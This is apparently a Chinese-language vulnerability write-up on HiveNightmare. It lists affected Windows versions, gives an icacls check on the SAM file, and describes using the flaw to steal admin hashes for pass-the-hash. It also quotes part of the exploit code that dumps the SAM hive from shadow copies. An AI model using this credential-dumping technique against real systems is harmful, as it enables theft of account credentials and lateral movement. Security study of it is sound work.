Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Version 20H2 for x64-based Systems Windows Server, version 2004 (Server Core installation) Windows 10 Version 2004 for x64-based Systems Windows 10 Version 2004 for ARM64-based Systems Windows 10 Version 2004 for 32-bit Systems Windows 10 Version 21H1 for 32-bit Systems Windows 10 Version 21H1 for ARM64-based Systems Windows 10 Version 21H1 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows Server 2019 (Server Core installation) Windows Server 2019 Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows 10 Version 1809 for x64-based Systems
0x02 漏洞复现
使用Admin权限执行该命令:
1
icacls c:\Windows\System32\Config\SAM
如果输出BUILTIN\USERS:(I)(RX)则漏洞存在。
Jonas L在win11中发现权限访问问题,非管理员用户可以访问c:\Windows\System32\config\下的敏感配置,这其中包括了SAM这些凭证信息。作为非管理员通过这个权限问题,可以读取出管理的hash凭证。在内网中,我们便可以进行哈希传递这些横向移动。
wcout << L"\nHiveNightmare v0.5 - dump registry hives as non-admin users\n\nSpecify maximum number of shadows to inspect with parameter if wanted, default is 15.\n\nRunning...\n\n";
hFile = getVssFileHandle(samLocation, searchDepth); if (hFile == INVALID_HANDLE_VALUE) { wcout << "Could not open SAM :( Is System Protection not enabled or vulnerability fixed? Try increasing the number of VSS snapshots to search - list snapshots with vssadmin list shadows\n"; return-1; //读取Windows\System32\config\SAM失败的错误处理 } else { getFileTime(hFile, fileTime, 200); swprintf_s(fileName, L"SAM-%s", fileTime); //buggy if name too long dumpHandleToFile(hFile, fileName); CloseHandle(hFile); //操作结束,关闭文件句柄 wcout << endl << L"Success: SAM hive from " << fileTime << L" written out to current working directory as " << fileName << endl << endl; }
